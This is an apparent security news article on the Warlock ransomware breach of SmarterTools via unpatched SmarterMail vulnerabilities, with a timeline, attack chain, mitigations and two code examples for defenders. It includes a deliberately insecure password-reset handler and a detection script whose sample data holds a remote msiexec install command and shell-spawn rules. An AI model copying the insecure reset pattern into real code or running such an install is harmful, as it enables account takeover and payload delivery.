SmarterTools’ SmarterMail email server breached by the Warlock ransomware group



SmarterTools’ SmarterMail email server was breached by the Warlock ransomware group after attackers exploited unpatched vulnerabilities in the software. If you’re part of the security team at your company, you should understand how this compromise unfolded, the vulnerabilities involved, and the enterprise risk implications for mail server deployments worldwide.

The breach occurred on January 29, 2026, when an employee-managed SmarterMail instance that was not updated to the latest secure build was compromised.

From that foothold, attackers moved laterally into SmarterTools’ internal network, impacting Windows servers and staging ransomware activities.

“At the data center, we hosted our Portal as well as our Hosted SmarterTrack network, which was connected via Active Directory,” Derek Curtis, who works at SmarterTools, explained in a security report. “We didn’t see much affected there and, out of an abundance of caution, we restored some of those servers from the most recent backup, which was six hours old.”

How the Warlock Ransomware Breach Unfolded

The attack began by targeting internet-facing SmarterMail instances that were missing recent security patches. Two critical vulnerabilities have been confirmed as exploited or targeted during the breach: CVE-2026-23760 and CVE-2026-24423.

CVE-2026-23760 (Authentication Bypass):

This flaw allows an unauthenticated attacker to reset the SmarterMail system administrator password by abusing the password reset API without providing the old password or a valid token. Success on this vulnerability grants administrative control over the mail software and, indirectly, full system control on the host server.
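To make the missing check concrete, the following is an added example, not SmarterTools’ code and not a description of SmarterMail’s actual API: a hypothetical password-reset handler written the broken way (any caller who knows the username can set a new password) beside a handler that requires a single-use, expiring reset token bound to the account. All names (AccountStore, reset_password_secure, TOKEN_TTL_SECONDS) are constructed for the illustration.

```python
"""Hypothetical password-reset handlers (constructed illustration, not SmarterMail code).

The insecure version shows the class of defect behind an authentication-bypass in a reset
API: the request carries no proof that the caller is entitled to the reset. The secure
version requires a server-issued, single-use, expiring token and compares it in constant time.
"""
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional

TOKEN_TTL_SECONDS = 15 * 60  # assumed policy: a reset token is valid for 15 minutes


def hash_secret(value: str) -> str:
    # sha256 keeps the example dependency-free; real password storage should use a
    # dedicated password hash (argon2id, bcrypt, scrypt) instead.
    return hashlib.sha256(value.encode("utf-8")).hexdigest()


@dataclass
class Account:
    username: str
    password_hash: str
    reset_token_hash: Optional[str] = None  # only the hash of the outstanding token is stored
    reset_expires_at: float = 0.0


class AccountStore:
    def __init__(self) -> None:
        self.accounts: Dict[str, Account] = {}

    def add(self, username: str, password: str) -> None:
        self.accounts[username] = Account(username, hash_secret(password))

    def issue_reset_token(self, username: str, now: Optional[float] = None) -> str:
        """Mint a random single-use token; the caller delivers it out of band (e.g. e-mail)."""
        now = time.time() if now is None else now
        acct = self.accounts[username]
        token = secrets.token_urlsafe(32)
        acct.reset_token_hash = hash_secret(token)
        acct.reset_expires_at = now + TOKEN_TTL_SECONDS
        return token


def reset_password_insecure(store: AccountStore, username: str, new_password: str) -> bool:
    """Broken pattern: no old password and no token are checked before the reset."""
    acct = store.accounts.get(username)
    if acct is None:
        return False
    acct.password_hash = hash_secret(new_password)
    return True


def reset_password_secure(store: AccountStore, username: str, token: str,
                          new_password: str, now: Optional[float] = None) -> bool:
    """Reset only with a valid, unexpired, not-yet-used token for this account."""
    now = time.time() if now is None else now
    acct = store.accounts.get(username)
    if acct is None or acct.reset_token_hash is None:
        return False
    if now > acct.reset_expires_at:
        acct.reset_token_hash = None  # expired tokens are discarded, not retried
        return False
    if not hmac.compare_digest(acct.reset_token_hash, hash_secret(token)):
        return False
    acct.password_hash = hash_secret(new_password)
    acct.reset_token_hash = None  # single use: invalidate immediately after success
    acct.reset_expires_at = 0.0
    return True


def verify_password(store: AccountStore, username: str, password: str) -> bool:
    acct = store.accounts.get(username)
    return acct is not None and hmac.compare_digest(acct.password_hash, hash_secret(password))
```

The point for reviewers of any reset endpoint is the shape of `reset_password_secure`: the token is generated server-side, stored only as a hash, expires, is compared in constant time, and is invalidated on first use. A change-password flow for an already authenticated user would additionally require the old password, which is the other check the advisory text says was missing.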

CVE-2026-24423 (Remote Code Execution):

This issue affects the ConnectToHub API and can result in full remote code execution on vulnerable SmarterMail servers. An attacker can send crafted API requests to execute arbitrary code without authorization.

Both vulnerabilities were fixed in SmarterMail build 9511 and later releases. However, servers that were not patched before the Warlock breach remained exposed.

Date              Event
Jan 15, 2026      SmarterMail build 9511 released with fixes for critical vulnerabilities.
Jan 22, 2026      SmarterMail build 9526 released with further enhancements.
Jan 29, 2026      Warlock ransomware attackers compromise an unpatched SmarterMail VM at SmarterTools.
Early Feb 2026    CISA adds CVE-2026-24423 to its Known Exploited Vulnerabilities (KEV) catalog.

Attack Chain and Enterprise Risk

The Warlock breach highlights a multi-stage attack chain rather than a single point of compromise. The sequence observed in this incident was:

  1. Initial Access: Attackers exploited an unpatched SmarterMail instance using CVE-2026-23760 or CVE-2026-24423.
  2. Privilege Escalation: After gaining admin control of SmarterMail, the attackers leveraged built-in features like the “Volume Mount” to escalate to full server control.
  3. Persistence and Reconnaissance: Legitimate tools, such as Velociraptor (an open-source forensics and monitoring application), were installed to maintain persistence and blend with normal activity.
  4. Lateral Movement and Staging: Attackers then moved laterally into other Windows servers via Active Directory and staged for eventual ransomware deployment.
  5. Potential Encryption Phase: In this case, endpoint security products reportedly blocked full encryption, but the intent and vectors for ransomware execution were clearly present.

Enterprise Risk Considerations

  • Unpatched software remains the top risk vector in ransomware incidents.
  • Internet-facing infrastructure like mail servers is frequently probed by automated scanning tools and threat actors.
  • Abuse of legitimate administrative features (Volume Mount, reset APIs) reduces detection chances and can disguise malicious behavior as normal operations.
  • Persistence with trusted software (like Velociraptor) further complicates detection and remediation.

Recommended Security Measures

To reduce risk from similar attacks, organizations should take the following steps:

  • Patch Immediately: Upgrade all SmarterMail instances to the latest secure build (9511 or newer).
  • Isolate Mail Servers: Place servers in segmented networks (DMZ) and restrict access to only required protocols.
  • Harden Administrative Interfaces: Limit exposure of API endpoints and apply strict authentication and monitoring.
  • Monitor Suspicious Activity: Alert on unusual API calls, password resets, mount operations, and the execution of administrative tools.
  • Restrict Outbound Traffic: Block all unnecessary outbound connections to prevent command-and-control callbacks.

Common Indicators of Compromise (IOCs)

  • Successful use of SmarterMail password reset API from unknown sources.
  • Unexpected Velociraptor service installations.
  • Command shell (cmd.exe) spawned by SmarterMail service.
  • MSI installers downloaded from third-party hosts (e.g., Supabase).
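The indicators above, together with the “Monitor Suspicious Activity” recommendation, translate directly into detection rules. The following is an added example (not from SmarterTools or this article) that runs four such rules over a handful of constructed telemetry events. The event field names, the mail service executable name (`MAIL_SERVICE_EXE`), the reset-endpoint path pattern (`RESET_PATH_RE`), the trusted management subnet and the MSI host allow-list are all placeholders to be replaced with values from your own deployment and log pipeline.

```python
"""Constructed detection rules for the indicators listed in the article.

Placeholders (replace with your deployment's values): the mail service executable name,
the reset-endpoint path pattern, the management subnet and the approved MSI download hosts.
Event dictionaries below are constructed samples, not real SmarterMail or Windows logs.
"""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

MAIL_SERVICE_EXE = "mailservice.exe"  # placeholder: the SmarterMail service binary on your host
RESET_PATH_RE = re.compile(r"/api/.*reset", re.IGNORECASE)  # placeholder reset-endpoint pattern
TRUSTED_ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/24")]  # constructed management subnet
APPROVED_MSI_HOSTS = {"updates.example.internal"}  # constructed allow-list of MSI sources
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def from_trusted_net(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_ADMIN_NETS)


def check_event(ev: Dict) -> Optional[Tuple[str, str]]:
    """Return (rule_name, detail) when an event matches an indicator, else None."""
    kind = ev.get("type")
    if kind == "process_create":
        parent, image = basename(ev["parent_image"]), basename(ev["image"])
        # Indicator: command shell spawned by the mail service process.
        if parent == MAIL_SERVICE_EXE and image in SHELLS:
            return ("mail_service_spawned_shell", f"{parent} -> {image}")
        # Indicator: MSI installer fetched from a host outside the allow-list.
        if image == "msiexec.exe":
            for word in ev.get("command_line", "").split():
                if word.lower().startswith(("http://", "https://")):
                    host = urlparse(word).hostname
                    if host and host not in APPROVED_MSI_HOSTS:
                        return ("msi_from_unapproved_host", host)
    elif kind == "service_install":
        # Indicator: Velociraptor service appearing without an approved deployment record.
        name = (ev.get("service_name", "") + " " + ev.get("image", "")).lower()
        if "velociraptor" in name and not ev.get("change_ticket"):
            return ("unexpected_velociraptor_service", ev.get("service_name", ""))
    elif kind == "http_request":
        # Indicator: successful password-reset API call from outside the management subnet.
        if (RESET_PATH_RE.search(ev["path"]) and ev.get("status") == 200
                and not from_trusted_net(ev["src_ip"])):
            return ("password_reset_from_untrusted_source", ev["src_ip"])
    return None


def scan(events: List[Dict]) -> List[Tuple[str, str]]:
    return [hit for hit in (check_event(ev) for ev in events) if hit is not None]


# Constructed sample telemetry: four suspicious events interleaved with benign look-alikes.
SAMPLE_EVENTS = [
    {"type": "process_create", "parent_image": r"C:\Program Files\Mail\MailService.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c hostname"},
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe"},
    {"type": "process_create", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i https://files.example-third-party.net/agent.msi /qn"},
    {"type": "process_create", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i https://updates.example.internal/patch.msi /qn"},
    {"type": "service_install", "service_name": "Velociraptor",
     "image": r"C:\Program Files\Velociraptor\velociraptor.exe", "change_ticket": None},
    {"type": "service_install", "service_name": "Velociraptor",
     "image": r"C:\Program Files\Velociraptor\velociraptor.exe", "change_ticket": "CHG-0042"},
    {"type": "http_request", "src_ip": "10.20.0.15", "path": "/api/v1/auth/reset-password", "status": 200},
    {"type": "http_request", "src_ip": "203.0.113.7", "path": "/api/v1/auth/reset-password", "status": 200},
    {"type": "http_request", "src_ip": "203.0.113.7", "path": "/api/v1/auth/reset-password", "status": 403},
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"ALERT {rule}: {detail}")
```

Each rule is deliberately paired with a benign look-alike in the sample data (a shell launched by `explorer.exe`, an MSI from the approved host, a Velociraptor deployment with a change record, a reset from the management subnet, a reset attempt that was denied), because the value of these indicators comes from the context around them, not from the tool or API name alone.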